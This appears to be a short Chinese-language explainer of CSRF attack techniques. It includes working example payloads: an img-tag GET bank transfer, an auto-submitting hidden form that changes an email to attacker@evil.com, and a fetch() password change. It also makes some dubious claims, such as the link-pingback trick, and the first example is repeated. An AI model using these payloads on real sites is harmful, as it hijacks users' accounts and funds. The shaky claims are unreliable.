基础GET型请求伪造
恶意构造含关键参数的URL诱导点击:
<img src="https://bank.com/transfer?to=hacker&amount=10000">
当用户会话有效时,浏览器自动携带身份凭证触发敏感操作
恶意构造含关键参数的URL诱导点击:
<img src="https://bank.com/transfer?to=hacker&amount=10000">
当用户会话有效时,浏览器自动携带身份凭证触发敏感操作
伪造隐藏表单实现自动提交:
<form action="https://api.example/profile/update" method=POST> <input type="hidden" name="email" value="attacker@evil.com"> <input type="submit" value="查看福利"> </form> <script>document.forms[0].submit()</script>
利用CORS配置缺陷发起跨域请求:
fetch('https://api.target/change-password', { method: 'POST', headers: {'Content-Type': 'text/plain'}, body: '{"new_password":"hacked"}' })
当服务器未验证Content-Type且未使用CSRF Token时生效
利用浏览器特性构造特殊请求:
<link rel="pingback" href="https://vuln-site.com/logout">
通过prefetch、web sockets等新特性绕过传统防御机制
利用多路复用特性构造并发请求干扰防御机制
通过建立持久化连接执行特权指令
劫持OAuth授权流程获取CSRF触发权限